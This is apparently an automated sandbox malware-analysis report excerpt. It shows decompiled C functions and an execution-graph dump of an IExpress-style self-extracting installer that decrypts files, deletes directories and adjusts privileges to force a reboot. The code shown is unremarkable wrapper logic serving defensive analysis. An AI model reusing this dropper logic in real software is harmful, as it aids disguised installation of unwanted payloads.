                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleWrite
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 1065093856-1193786559
                                                          • Opcode ID: dad0d64cf15c08982519b444f19cb2dd191d02f59170e71a44eaa01eb7af254b
                                                          • Instruction ID: ed9ac6cf5ee1e9cd0cd30c746cc4acfa809b120cb6f6d1e9361af5e36e4e3bba
                                                          • Opcode Fuzzy Hash: dad0d64cf15c08982519b444f19cb2dd191d02f59170e71a44eaa01eb7af254b
                                                          • Instruction Fuzzy Hash: C421C371A0021CAFD720DF25DC85FEF77A8EB99714F1041ADB9C5A3280DAB55D848F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C47E0(intOrPtr* __ecx) {
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t11;
                                                          				void* _t19;
                                                          				intOrPtr* _t22;
                                                          				void _t24;
                                                          				struct HWND__* _t25;
                                                          				struct HWND__* _t26;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t33 = __ecx;
                                                          				_t34 = LocalAlloc(0x40, 8);
                                                          				if(_t34 != 0) {
                                                          					_t22 = _t33;
                                                          					_t27 = _t22 + 1;
                                                          					do {
                                                          						_t6 =  *_t22;
                                                          						_t22 = _t22 + 1;
                                                          					} while (_t6 != 0);
                                                          					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                          					 *_t34 = _t24;
                                                          					if(_t24 != 0) {
                                                          						_t28 = _t33;
                                                          						_t19 = _t28 + 1;
                                                          						do {
                                                          							_t9 =  *_t28;
                                                          							_t28 = _t28 + 1;
                                                          						} while (_t9 != 0);
                                                          						E010C1680(_t24, _t28 - _t19 + 1, _t33);
                                                          						_t11 =  *0x10c91e0; // 0xc282e0
                                                          						 *(_t34 + 4) = _t11;
                                                          						 *0x10c91e0 = _t34;
                                                          						return 1;
                                                          					}
                                                          					_t25 =  *0x10c8584; // 0x0
                                                          					E010C44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                          					LocalFree(_t34);
                                                          					L2:
                                                          					return 0;
                                                          				}
                                                          				_t26 =  *0x10c8584; // 0x0
                                                          				E010C44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                          				goto L2;
                                                          			}
















                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010C4E6F), ref: 010C47EA
                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 010C4823
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010C4847
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C4851
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Local$Alloc$FreeLoadMessageString
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 359063898-1193786559
                                                          • Opcode ID: b163da831e7f89852d67e635f57eb98fb4b80ab959164124601bbe555242b065
                                                          • Instruction ID: 16bd6a5cec8b995a24048c53cf6bf7b3e17c0ef51f06955b8580a73d8b98219d
                                                          • Opcode Fuzzy Hash: b163da831e7f89852d67e635f57eb98fb4b80ab959164124601bbe555242b065
                                                          • Instruction Fuzzy Hash: 80110675604641AFE7658F249828F7F3B9AFBC5B40B14855DEDC2C7285DA3AC80ACF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E010C6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                          				struct HRSRC__* _t6;
                                                          				void* _t21;
                                                          				struct HINSTANCE__* _t23;
                                                          				int _t24;
                                                          
                                                          				_t23 =  *0x10c9a3c; // 0x10c0000
                                                          				_t6 = FindResourceA(_t23, __edx, 5);
                                                          				if(_t6 == 0) {
                                                          					L6:
                                                          					E010C44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                          					_t24 = _a16;
                                                          				} else {
                                                          					_t21 = LoadResource(_t23, _t6);
                                                          					if(_t21 == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						if(_a12 != 0) {
                                                          							_push(_a12);
                                                          						} else {
                                                          							_push(0);
                                                          						}
                                                          						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                          						FreeResource(_t21);
                                                          						if(_t24 == 0xffffffff) {
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t24;
                                                          			}








                                                          APIs
                                                          • FindResourceA.KERNEL32(010C0000,000007D6,00000005), ref: 010C652A
                                                          • LoadResource.KERNEL32(010C0000,00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010C6538
                                                          • DialogBoxIndirectParamA.USER32(010C0000,00000000,00000547,010C19E0,00000000), ref: 010C6557
                                                          • FreeResource.KERNEL32(00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010C6560
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 1214682469-0
                                                          • Opcode ID: 566dc1032f279b6c4dceb35f94a06fb633a7c962b5602d2e98924908fef97aa7
                                                          • Instruction ID: eb983da292a56d414bb727df20b3aefb6ba8fde99aabaff9cb060cb43a2c35f6
                                                          • Opcode Fuzzy Hash: 566dc1032f279b6c4dceb35f94a06fb633a7c962b5602d2e98924908fef97aa7
                                                          • Instruction Fuzzy Hash: 7F018472600519BFDB315B599C48DBF7AACEB95B61F100159FE9093244DA77CD108FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C3680(void* __ecx) {
                                                          				void* _v8;
                                                          				struct tagMSG _v36;
                                                          				int _t8;
                                                          				struct HWND__* _t16;
                                                          
                                                          				_v8 = __ecx;
                                                          				_t16 = 0;
                                                          				while(1) {
                                                          					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                          						continue;
                                                          					} else {
                                                          						do {
                                                          							if(_v36.message != 0x12) {
                                                          								DispatchMessageA( &_v36);
                                                          							} else {
                                                          								_t16 = 1;
                                                          							}
                                                          							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                          						} while (_t8 != 0);
                                                          						if(_t16 == 0) {
                                                          							continue;
                                                          						}
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t8;
                                                          			}








                                                          APIs
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010C369F
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36B2
                                                          • DispatchMessageA.USER32(?), ref: 010C36CB
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                          • String ID:
                                                          • API String ID: 2776232527-0
                                                          • Opcode ID: 1d39fdd69cc1aae150ee88c11e6554c020e2bd8e147d1710a959ab403cc9dc9b
                                                          • Instruction ID: d0843ed73726712bb7726676a151f37706f5e0a41a37b2fc07ed2d366b7833e8
                                                          • Opcode Fuzzy Hash: 1d39fdd69cc1aae150ee88c11e6554c020e2bd8e147d1710a959ab403cc9dc9b
                                                          • Instruction Fuzzy Hash: CF017172A00218ABDB304BAA5C48EAF7ABCEBC9F50F00815DBE45E6284D6658540CEA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E010C65E8(char* __ecx) {
                                                          				char _t3;
                                                          				char _t10;
                                                          				char* _t12;
                                                          				char* _t14;
                                                          				char* _t15;
                                                          				CHAR* _t16;
                                                          
                                                          				_t12 = __ecx;
                                                          				_t15 = __ecx;
                                                          				_t14 =  &(__ecx[1]);
                                                          				_t10 = 0;
                                                          				do {
                                                          					_t3 =  *_t12;
                                                          					_t12 =  &(_t12[1]);
                                                          				} while (_t3 != 0);
                                                          				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, ??);
                                                          					if(_t16 <= _t15) {
                                                          						break;
                                                          					}
                                                          					if( *_t16 == 0x5c) {
                                                          						L7:
                                                          						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						 *_t16 = _t10;
                                                          						_t10 = 1;
                                                          					} else {
                                                          						_push(_t16);
                                                          						continue;
                                                          					}
                                                          					L11:
                                                          					return _t10;
                                                          				}
                                                          				if( *_t16 == 0x5c) {
                                                          					goto L7;
                                                          				}
                                                          				goto L11;
                                                          			}










                                                          APIs
                                                          • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010C2B33), ref: 010C6602
                                                          • CharPrevA.USER32(?,00000000), ref: 010C6612
                                                          • CharPrevA.USER32(?,00000000), ref: 010C6629
                                                          • CharNextA.USER32(00000000), ref: 010C6635
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Prev$Next
                                                          • String ID:
                                                          • API String ID: 3260447230-0
                                                          • Opcode ID: 0cec8228a058bbb110ec937e73f1f91dd91030ddbe02a814b05bb80da962279a
                                                          • Instruction ID: 8359d50ec6ef6ea80867946b49ebfda9aaad12fb015ca98b84796c8936e7ae27
                                                          • Opcode Fuzzy Hash: 0cec8228a058bbb110ec937e73f1f91dd91030ddbe02a814b05bb80da962279a
                                                          • Instruction Fuzzy Hash: F9F0D132104150AEE7320B2D888C8BFBFDCCF8B59472901AFE9D183201E61B09068F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C69B0() {
                                                          				intOrPtr* _t4;
                                                          				intOrPtr* _t5;
                                                          				void* _t6;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t12;
                                                          
                                                          				 *0x10c81f8 = E010C6C70();
                                                          				__set_app_type(E010C6FBE(2));
                                                          				 *0x10c88a4 =  *0x10c88a4 | 0xffffffff;
                                                          				 *0x10c88a8 =  *0x10c88a8 | 0xffffffff;
                                                          				_t4 = __p__fmode();
                                                          				_t11 =  *0x10c8528; // 0x0
                                                          				 *_t4 = _t11;
                                                          				_t5 = __p__commode();
                                                          				_t12 =  *0x10c851c; // 0x0
                                                          				 *_t5 = _t12;
                                                          				_t6 = E010C7000();
                                                          				if( *0x10c8000 == 0) {
                                                          					__setusermatherr(E010C7000);
                                                          				}
                                                          				E010C71EF(_t6);
                                                          				return 0;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 010C6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010C6FC5
                                                          • __set_app_type.MSVCRT ref: 010C69C2
                                                          • __p__fmode.MSVCRT ref: 010C69D8
                                                          • __p__commode.MSVCRT ref: 010C69E6
                                                          • __setusermatherr.MSVCRT ref: 010C6A07
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                          • String ID:
                                                          • API String ID: 1632413811-0
                                                          • Opcode ID: 1696639e1554738819c5208441eec10a68a87de68eaec45fa5e45282898162f8
                                                          • Instruction ID: 180d498bad0f9709baddc6af494db168a930f810efbc9288849d35cad3b6e8e8
                                                          • Opcode Fuzzy Hash: 1696639e1554738819c5208441eec10a68a87de68eaec45fa5e45282898162f8
                                                          • Instruction Fuzzy Hash: 58F0F874604326CFC778AB38E50D6493BA2FB54721B20860EE8E2862D8DB7F81458F18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:26.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:967
                                                          Total number of Limit Nodes:42
SetForegroundWindow 3232->3233 3233->3231 3234 109348c EndDialog 3234->3231 3235->3231 3235->3234 3236 1096bef _XcptFilter 2354 1094ca0 GlobalAlloc 2355 1096a60 2372 1097155 2355->2372 2357 1096a65 2358 1096a76 GetStartupInfoW 2357->2358 2359 1096a93 2358->2359 2360 1096aa8 2359->2360 2361 1096aaf Sleep 2359->2361 2362 1096ac7 _amsg_exit 2360->2362 2364 1096ad1 2360->2364 2361->2359 2362->2364 2363 1096b13 _initterm 2370 1096b2e __IsNonwritableInCurrentImage 2363->2370 2364->2363 2366 1096af4 2364->2366 2364->2370 2365 1096bd6 _ismbblead 2365->2370 2367 1096c1e 2367->2366 2369 1096c27 _cexit 2367->2369 2369->2366 2370->2365 2370->2367 2371 1096bbe exit 2370->2371 2377 1092bfb GetVersion 2370->2377 2371->2370 2373 109717a 2372->2373 2374 109717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2374 2373->2374 2375 10971e2 2373->2375 2376 10971cd 2374->2376 2375->2357 2376->2375 2378 1092c0f 2377->2378 2379 1092c50 2377->2379 2378->2379 2380 1092c13 GetModuleHandleW 2378->2380 2394 1092caa memset memset memset 2379->2394 2380->2379 2382 1092c22 GetProcAddress 2380->2382 2382->2379 2391 1092c34 2382->2391 2384 1092c8e 2385 1092c9e 2384->2385 2386 1092c97 CloseHandle 2384->2386 2385->2370 2386->2385 2391->2379 2392 1092c89 2489 1091f90 2392->2489 2506 109468f FindResourceA SizeofResource 2394->2506 2397 1092d2d CreateEventA SetEvent 2398 109468f 7 API calls 2397->2398 2400 1092d57 2398->2400 2399 10944b9 20 API calls 2401 1092f06 2399->2401 2402 1092d5b 2400->2402 2403 1092d7d 2400->2403 2405 1096ce0 4 API calls 2401->2405 2406 10944b9 20 API calls 2402->2406 2404 1092e1f 2403->2404 2407 109468f 7 API calls 2403->2407 2511 1095c9e 2404->2511 2408 1092c62 2405->2408 2410 1092d6e 2406->2410 2411 1092d9f 2407->2411 2408->2384 2435 1092f1d 2408->2435 2410->2401 2411->2402 2415 1092da3 CreateMutexA 2411->2415 2413 1092e3a 2416 1092e43 2413->2416 2417 1092e52 FindResourceA 2413->2417 2414 1092e30 2414->2399 2415->2404 
2418 1092dbd GetLastError 2415->2418 2537 1092390 2416->2537 2421 1092e6e 2417->2421 2422 1092e64 LoadResource 2417->2422 2418->2404 2420 1092dca 2418->2420 2423 1092dea 2420->2423 2424 1092dd5 2420->2424 2421->2410 2552 10936ee GetVersionExA 2421->2552 2422->2421 2426 10944b9 20 API calls 2423->2426 2425 10944b9 20 API calls 2424->2425 2427 1092de8 2425->2427 2428 1092dff 2426->2428 2430 1092e04 CloseHandle 2427->2430 2428->2404 2428->2430 2430->2401 2434 1096517 24 API calls 2434->2410 2436 1092f6c 2435->2436 2437 1092f3f 2435->2437 2661 1095164 2436->2661 2439 1092f5f 2437->2439 2641 10951e5 2437->2641 2794 1093a3f 2439->2794 2441 1092f71 2444 1093041 2441->2444 2676 10955a0 2441->2676 2448 1096ce0 4 API calls 2444->2448 2450 1092c6b 2448->2450 2449 1092f86 GetSystemDirectoryA 2451 109658a CharPrevA 2449->2451 2476 10952b6 2450->2476 2452 1092fab LoadLibraryA 2451->2452 2453 1092fc0 GetProcAddress 2452->2453 2454 1092ff7 FreeLibrary 2452->2454 2453->2454 2457 1092fd6 DecryptFileA 2453->2457 2455 1093017 SetCurrentDirectoryA 2454->2455 2456 1093006 2454->2456 2458 1093054 2455->2458 2459 1093026 2455->2459 2456->2455 2726 109621e GetWindowsDirectoryA 2456->2726 2457->2454 2464 1092ff0 2457->2464 2460 1093061 2458->2460 2737 1093b26 2458->2737 2462 10944b9 20 API calls 2459->2462 2460->2444 2466 109307a 2460->2466 2746 109256d 2460->2746 2468 1093037 2462->2468 2464->2454 2472 1093098 2466->2472 2757 1093ba2 2466->2757 2813 1096285 GetLastError 2468->2813 2472->2444 2473 10930af 2472->2473 2815 1094169 2473->2815 2478 10952d6 2476->2478 2486 1095316 2476->2486 2477 1095300 LocalFree LocalFree 2477->2478 2477->2486 2478->2477 2481 10952eb SetFileAttributesA DeleteFileA 2478->2481 2479 109538c 2482 1096ce0 4 API calls 2479->2482 2480 1095374 2480->2479 3124 1091fe1 2480->3124 2481->2477 2484 1092c72 2482->2484 2484->2384 2484->2392 2485 109535e SetCurrentDirectoryA 2488 1092390 13 API calls 2485->2488 2486->2480 2486->2485 2487 10965e8 4 API calls 2486->2487 
2487->2485 2488->2480 2490 1091f9a 2489->2490 2491 1091f9f 2489->2491 2493 1091ea7 15 API calls 2490->2493 2492 1091fc0 2491->2492 2494 10944b9 20 API calls 2491->2494 2497 1091fd9 2491->2497 2495 1091ee2 GetCurrentProcess OpenProcessToken 2492->2495 2496 1091fcf ExitWindowsEx 2492->2496 2492->2497 2493->2491 2494->2492 2499 1091f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 1091f0e 2495->2501 2496->2497 2497->2384 2500 1091f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 1091f1f 2500->2502 2503 10944b9 20 API calls 2501->2503 2504 1096ce0 4 API calls 2502->2504 2503->2502 2505 1091f8c 2504->2505 2505->2384 2507 1092d1a 2506->2507 2508 10946b6 2506->2508 2507->2397 2507->2414 2508->2507 2509 10946be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 10946df memcpy_s FreeResource 2509->2510 2510->2507 2518 1095e17 2511->2518 2520 1095cc3 2511->2520 2512 1095dd0 2516 1095dec GetModuleFileNameA 2512->2516 2512->2518 2513 1096ce0 4 API calls 2514 1092e2c 2513->2514 2514->2413 2514->2414 2515 1095ced CharNextA 2515->2520 2517 1095e0a 2516->2517 2516->2518 2587 10966c8 2517->2587 2518->2513 2520->2512 2520->2515 2520->2518 2521 1096218 2520->2521 2524 1095e36 CharUpperA 2520->2524 2530 1095f9f CharUpperA 2520->2530 2531 1095f59 CompareStringA 2520->2531 2532 1096003 CharUpperA 2520->2532 2533 109667f IsDBCSLeadByte CharNextA 2520->2533 2534 1095edc CharUpperA 2520->2534 2535 10960a2 CharUpperA 2520->2535 2592 109658a 2520->2592 2596 1096e2a 2521->2596 2524->2520 2525 10961d0 2524->2525 2526 10944b9 20 API calls 2525->2526 2527 10961e7 2526->2527 2528 10961f0 CloseHandle 2527->2528 2529 10961f7 ExitProcess 2527->2529 2528->2529 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 10924cb 2537->2538 2541 10923b9 2537->2541 2539 1096ce0 4 API calls 2538->2539 2540 10924dc 2539->2540 2540->2410 2541->2538 2542 10923e9 FindFirstFileA 2541->2542 2542->2538 2543 1092407 2542->2543 2544 1092479 2543->2544 2545 
1092421 lstrcmpA 2543->2545 2546 10924a9 FindNextFileA 2543->2546 2550 109658a CharPrevA 2543->2550 2551 1092390 5 API calls 2543->2551 2548 1092488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 1092431 lstrcmpA 2545->2547 2546->2543 2549 10924bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2553 109372d 2552->2553 2557 1093737 2552->2557 2554 10944b9 20 API calls 2553->2554 2566 10939fc 2553->2566 2554->2566 2555 1096ce0 4 API calls 2556 1092e92 2555->2556 2556->2401 2556->2410 2567 10918a3 2556->2567 2557->2553 2559 10938a4 2557->2559 2557->2566 2603 10928e8 2557->2603 2559->2553 2560 10939c1 MessageBeep 2559->2560 2559->2566 2561 109681f 10 API calls 2560->2561 2562 10939ce 2561->2562 2563 10939d8 MessageBoxA 2562->2563 2564 10967c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2555 2568 10918d5 2567->2568 2573 10919b8 2567->2573 2632 10917ee LoadLibraryA 2568->2632 2570 1096ce0 4 API calls 2571 10919d5 2570->2571 2571->2410 2571->2434 2573->2570 2574 10918e5 GetCurrentProcess OpenProcessToken 2574->2573 2575 1091900 GetTokenInformation 2574->2575 2576 1091918 GetLastError 2575->2576 2577 10919aa CloseHandle 2575->2577 2576->2577 2578 1091927 LocalAlloc 2576->2578 2577->2573 2579 10919a9 2578->2579 2580 1091938 GetTokenInformation 2578->2580 2579->2577 2581 109194e AllocateAndInitializeSid 2580->2581 2582 10919a2 LocalFree 2580->2582 2581->2582 2586 109196e 2581->2586 2582->2579 2583 1091999 FreeSid 2583->2582 2584 1091975 EqualSid 2585 109198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2590 10966d5 2587->2590 2588 10966f3 2588->2518 2590->2588 2591 10966e5 CharNextA 2590->2591 2599 1096648 2590->2599 2591->2590 2593 109659b 2592->2593 2594 10965ab 2593->2594 2595 10965b8 CharPrevA 2593->2595 2594->2520 2595->2594 2602 1096cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 109621d 2600 109665d 
IsDBCSLeadByte 2599->2600 2601 1096668 2599->2601 2600->2601 2601->2590 2602->2598 2604 1092a62 2603->2604 2610 109290d 2603->2610 2605 1092a6e GlobalFree 2604->2605 2606 1092a75 2604->2606 2605->2606 2606->2559 2608 1092955 GlobalAlloc 2608->2604 2609 1092968 GlobalLock 2608->2609 2609->2604 2609->2610 2610->2604 2610->2608 2611 1092a20 GlobalUnlock 2610->2611 2612 1092a80 GlobalUnlock 2610->2612 2613 1092773 2610->2613 2611->2610 2612->2604 2614 10927a3 CharUpperA CharNextA CharNextA 2613->2614 2615 10928b2 2613->2615 2616 10927db 2614->2616 2617 10928b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 10928a8 GetWindowsDirectoryA 2616->2618 2619 10927e3 2616->2619 2620 10928bf 2617->2620 2618->2620 2625 109658a CharPrevA 2619->2625 2621 10928d2 2620->2621 2622 109658a CharPrevA 2620->2622 2623 1096ce0 4 API calls 2621->2623 2622->2621 2624 10928e2 2623->2624 2624->2610 2626 1092810 RegOpenKeyExA 2625->2626 2626->2620 2627 1092837 RegQueryValueExA 2626->2627 2628 109289a RegCloseKey 2627->2628 2629 109285c 2627->2629 2628->2620 2630 1092867 ExpandEnvironmentStringsA 2629->2630 2631 109287a 2629->2631 2630->2631 2631->2628 2633 1091890 2632->2633 2634 1091826 GetProcAddress 2632->2634 2635 1096ce0 4 API calls 2633->2635 2636 1091889 FreeLibrary 2634->2636 2637 1091839 AllocateAndInitializeSid 2634->2637 2638 109189f 2635->2638 2636->2633 2637->2636 2639 109185f FreeSid 2637->2639 2638->2573 2638->2574 2639->2636 2642 109468f 7 API calls 2641->2642 2643 10951f9 LocalAlloc 2642->2643 2644 109522d 2643->2644 2645 109520d 2643->2645 2647 109468f 7 API calls 2644->2647 2646 10944b9 20 API calls 2645->2646 2648 109521e 2646->2648 2649 109523a 2647->2649 2650 1096285 GetLastError 2648->2650 2651 109523e 2649->2651 2652 1095262 lstrcmpA 2649->2652 2660 1095223 2650->2660 2653 10944b9 20 API calls 2651->2653 2654 109527e 2652->2654 2655 1095272 LocalFree 2652->2655 2657 109524f LocalFree 2653->2657 2656 10944b9 20 API calls 2654->2656 2658 1092f4d 2655->2658 2659 1095290 
LocalFree 2656->2659 2657->2658 2658->2436 2658->2439 2658->2444 2659->2660 2660->2658 2662 109468f 7 API calls 2661->2662 2663 1095175 2662->2663 2664 109517a 2663->2664 2665 10951af 2663->2665 2666 10944b9 20 API calls 2664->2666 2667 109468f 7 API calls 2665->2667 2668 109518d 2666->2668 2669 10951c0 2667->2669 2668->2441 2828 1096298 2669->2828 2673 10951ce 2675 10944b9 20 API calls 2673->2675 2674 10951e1 2674->2441 2675->2668 2677 109468f 7 API calls 2676->2677 2678 10955c7 LocalAlloc 2677->2678 2679 10955db 2678->2679 2680 10955fd 2678->2680 2682 10944b9 20 API calls 2679->2682 2681 109468f 7 API calls 2680->2681 2684 109560a 2681->2684 2683 10955ec 2682->2683 2685 1096285 GetLastError 2683->2685 2686 109560e 2684->2686 2687 1095632 lstrcmpA 2684->2687 2709 10955f1 2685->2709 2688 10944b9 20 API calls 2686->2688 2689 109564b LocalFree 2687->2689 2690 1095645 2687->2690 2691 109561f LocalFree 2688->2691 2692 109565b 2689->2692 2693 1095696 2689->2693 2690->2689 2714 10955f6 2691->2714 2698 1095467 49 API calls 2692->2698 2694 109589f 2693->2694 2697 10956ae GetTempPathA 2693->2697 2695 1096517 24 API calls 2694->2695 2695->2714 2696 1096ce0 4 API calls 2699 1092f7e 2696->2699 2700 10956eb 2697->2700 2701 10956c3 2697->2701 2702 1095678 2698->2702 2699->2444 2699->2449 2707 109586c GetWindowsDirectoryA 2700->2707 2708 1095717 GetDriveTypeA 2700->2708 2700->2714 2840 1095467 2701->2840 2704 1095680 2702->2704 2702->2714 2706 10944b9 20 API calls 2704->2706 2706->2709 2874 109597d GetCurrentDirectoryA SetCurrentDirectoryA 2707->2874 2710 1095730 GetFileAttributesA 2708->2710 2724 109572b 2708->2724 2709->2714 2710->2724 2714->2696 2715 1095467 49 API calls 2715->2700 2716 1092630 21 API calls 2716->2724 2718 10957c1 GetWindowsDirectoryA 2718->2724 2719 109597d 34 API calls 2719->2724 2720 109658a CharPrevA 2721 10957e8 GetFileAttributesA 2720->2721 2722 10957fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 1095827 SetFileAttributesA 2723->2724 
